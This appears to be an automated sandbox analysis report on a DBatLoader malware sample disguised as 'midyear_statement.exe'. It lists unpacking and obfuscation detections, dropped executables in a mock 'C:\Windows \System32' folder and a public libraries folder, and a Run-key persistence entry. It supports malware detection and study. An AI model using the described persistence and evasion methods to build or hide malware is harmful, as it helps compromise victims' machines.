Source:	Binary string: easinvoker.pdbH source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1291692035.0000000015C05000.00000004.00000020.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, 2506803.exe, 00000010.00000002.1294538505.00007FF790071000.00000020.00000001.01000000.00000005.sdmp, 2506803.exe.0.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\Public\Libraries\wkrriuhD.pif	Unpacked PE file: 27.2.wkrriuhD.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Unpacked PE file: 28.2.wkrriuhD.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Unpacked PE file: 29.2.wkrriuhD.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;

Detected unpacking (creates a PE file in dynamic memory)

Source: C:\Users\Public\Libraries\wkrriuhD.pif	Unpacked PE file: 24.2.wkrriuhD.pif.12330000.2.unpack
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Unpacked PE file: 31.2.wkrriuhD.pif.24140000.2.unpack

Yara detected DBatLoader

Source: Yara match	File source: 0.2.midyear_statement.exe.2656dc8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.midyear_statement.exe.2a46bd8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.midyear_statement.exe.40a0000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.midyear_statement.exe.2656dc8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.midyear_statement.exe.2a46bd8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.1190782910.000000007FD60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1365940643.0000000002A46000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1364633992.0000000002656000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.1640507310.0000000004171000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.1569609862.00000000040F1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY

Binary contains a suspicious time stamp

Source: wkrriuhD.pif.0.dr

Static PE information: 0x9E9038DB [Sun Apr 19 22:51:07 2054 UTC]

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\midyear_statement.exe

Code function: 0_2_040B7A50 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,

0_2_040B7A50

Entry point lies outside standard sections

Source: initial sample

Static PE information: section where entry point is pointing to: .....

PE file contains an invalid checksum

Source: midyear_statement.exe	Static PE information: real checksum: 0x0 should be: 0x139d32
Source: netutils.dll.0.dr	Static PE information: real checksum: 0x22e25 should be: 0x1cc51
Source: wkrriuhD.pif.0.dr	Static PE information: real checksum: 0x0 should be: 0x1768a
Source: Dhuirrkw.PIF.23.dr	Static PE information: real checksum: 0x0 should be: 0x139d32

PE file contains sections with non-standard names

Source: 2506803.exe.0.dr	Static PE information: section name: .imrsiv
Source: netutils.dll.0.dr	Static PE information: section name: .....
Source: netutils.dll.0.dr	Static PE information: section name: .....
Source: netutils.dll.0.dr	Static PE information: section name: ......
Source: netutils.dll.0.dr	Static PE information: section name: ......
Source: netutils.dll.0.dr	Static PE information: section name: ......
Source: netutils.dll.0.dr	Static PE information: section name: ....
Source: netutils.dll.0.dr	Static PE information: section name: ......
Source: netutils.dll.0.dr	Static PE information: section name: ......
Source: netutils.dll.0.dr	Static PE information: section name: ....
Source: netutils.dll.0.dr	Static PE information: section name: ......
Source: netutils.dll.0.dr	Static PE information: section name: /4
Source: netutils.dll.0.dr	Static PE information: section name: /19
Source: netutils.dll.0.dr	Static PE information: section name: /31
Source: netutils.dll.0.dr	Static PE information: section name: /45
Source: netutils.dll.0.dr	Static PE information: section name: /57
Source: netutils.dll.0.dr	Static PE information: section name: /70
Source: netutils.dll.0.dr	Static PE information: section name: /81
Source: netutils.dll.0.dr	Static PE information: section name: /92

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\midyear_statement.exe	Code function: 0_2_040BD48C push ecx; mov dword ptr [esp], edx	0_2_040BD491
Source: C:\Users\user\Desktop\midyear_statement.exe	Code function: 0_2_040AC4B0 push ecx; mov dword ptr [esp], edx	0_2_040AC4B5
Source: C:\Users\user\Desktop\midyear_statement.exe	Code function: 0_2_040AD4E4 push 040AD510h; ret	0_2_040AD508
Source: C:\Users\user\Desktop\midyear_statement.exe	Code function: 0_2_040A66FA push 040A673Eh; ret	0_2_040A6736
Source: C:\Users\user\Desktop\midyear_statement.exe	Code function: 0_2_040A66FC push 040A673Eh; ret	0_2_040A6736
Source: C:\Users\user\Desktop\midyear_statement.exe	Code function: 0_2_040CB0AC push 040CB125h; ret	0_2_040CB11D
Source: C:\Users\user\Desktop\midyear_statement.exe	Code function: 0_2_040CB144 push 040CB1ECh; ret	0_2_040CB1E4
Source: C:\Users\user\Desktop\midyear_statement.exe	Code function: 0_2_040CB1F8 push 040CB288h; ret	0_2_040CB280
Source: C:\Users\user\Desktop\midyear_statement.exe	Code function: 0_2_040CA2A4 push 040CA4A4h; ret	0_2_040CA49C
Source: C:\Users\user\Desktop\midyear_statement.exe	Code function: 0_2_040A32C0 push eax; ret	0_2_040A32FC
Source: C:\Users\user\Desktop\midyear_statement.exe	Code function: 0_2_040CB2F4 push 040CB35Fh; ret	0_2_040CB357
Source: C:\Users\user\Desktop\midyear_statement.exe	Code function: 0_2_040A631E push 040A637Bh; ret	0_2_040A6373
Source: C:\Users\user\Desktop\midyear_statement.exe	Code function: 0_2_040A6320 push 040A637Bh; ret	0_2_040A6373
Source: C:\Users\user\Desktop\midyear_statement.exe	Code function: 0_2_040CC360 pushad ; ret	0_2_040CC365
Source: C:\Users\user\Desktop\midyear_statement.exe	Code function: 0_2_040B7C48 push 040B7C80h; ret	0_2_040B7C78
Source: C:\Users\user\Desktop\midyear_statement.exe	Code function: 0_2_040B7C46 push 040B7C80h; ret	0_2_040B7C78
Source: C:\Users\user\Desktop\midyear_statement.exe	Code function: 0_2_040B5DC0 push ecx; mov dword ptr [esp], edx	0_2_040B5DC2
Source: C:\Users\user\Desktop\midyear_statement.exe	Code function: 0_2_040B2EA4 push 040B2F1Ah; ret	0_2_040B2F12
Source: C:\Users\user\Desktop\midyear_statement.exe	Code function: 0_2_040CEF18 push eax; ret	0_2_040CEFE8
Source: C:\Users\user\Desktop\midyear_statement.exe	Code function: 0_2_040B2FAF push 040B2FFDh; ret	0_2_040B2FF5
Source: C:\Users\user\Desktop\midyear_statement.exe	Code function: 0_2_040B2FB0 push 040B2FFDh; ret	0_2_040B2FF5
Source: C:\Users\user\Desktop\midyear_statement.exe	Code function: 0_2_040B7850 push 040B78CDh; ret	0_2_040B78C5
Source: C:\Users\user\Desktop\midyear_statement.exe	Code function: 0_2_040B688A push 040B6937h; ret	0_2_040B692F
Source: C:\Users\user\Desktop\midyear_statement.exe	Code function: 0_2_040B688C push 040B6937h; ret	0_2_040B692F
Source: C:\Users\user\Desktop\midyear_statement.exe	Code function: 0_2_040B9AF8 push 040B9B30h; ret	0_2_040B9B28
Source: C:\Users\user\Desktop\midyear_statement.exe	Code function: 0_2_040ACB2B push 040ACCB6h; ret	0_2_040ACCAE
Source: C:\Users\user\Desktop\midyear_statement.exe	Code function: 0_2_040ACB30 push 040ACCB6h; ret	0_2_040ACCAE
Source: C:\Windows \System32\2506803.exe	Code function: 16_2_613D0021 pushfq ; iretd	16_2_613D002A
Source: C:\Windows \System32\2506803.exe	Code function: 16_2_613D0D00 pushfq ; ret	16_2_613D0D01
Source: C:\Windows \System32\2506803.exe	Code function: 16_2_613D1DFE push rsp; iretd	16_2_613D1DFF
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_00402DB4 push eax; ret	24_2_00402E84

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Windows\SysWOW64\extrac32.exe	File created: C:\Users\Public\Libraries\Dhuirrkw.PIF			Jump to dropped file
Source: C:\Users\user\Desktop\midyear_statement.exe	File created: C:\Users\Public\Libraries\wkrriuhD.pif			Jump to dropped file

Drops executables to the windows directory (C:\Windows) and starts them

Source: C:\Windows\SysWOW64\cmd.exe

Executable created and started: C:\Windows \System32\2506803.exe

Jump to behavior

Contains functionality to download and launch executables

Source: C:\Users\Public\Libraries\wkrriuhD.pif

Code function: 24_2_12336EB0 ShellExecuteW,URLDownloadToFileW,

24_2_12336EB0

Drops PE files

Source: C:\Users\user\Desktop\midyear_statement.exe	File created: C:\Windows \System32\2506803.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\extrac32.exe	File created: C:\Users\Public\Libraries\Dhuirrkw.PIF	Jump to dropped file
Source: C:\Users\user\Desktop\midyear_statement.exe	File created: C:\Users\Public\Libraries\wkrriuhD.pif	Jump to dropped file
Source: C:\Users\user\Desktop\midyear_statement.exe	File created: C:\Windows \System32\netutils.dll	Jump to dropped file

Drops PE files to the windows directory (C:\Windows)

Source: C:\Users\user\Desktop\midyear_statement.exe	File created: C:\Windows \System32\2506803.exe			Jump to dropped file
Source: C:\Users\user\Desktop\midyear_statement.exe	File created: C:\Windows \System32\netutils.dll			Jump to dropped file

Source: C:\Users\Public\Libraries\wkrriuhD.pif

Code function: 24_2_1234AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

24_2_1234AA4A

Source: C:\Users\user\Desktop\midyear_statement.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Dhuirrkw			Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Dhuirrkw			Jump to behavior

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\Desktop\midyear_statement.exe

Code function: 0_2_040B9B34 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_040B9B34

Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
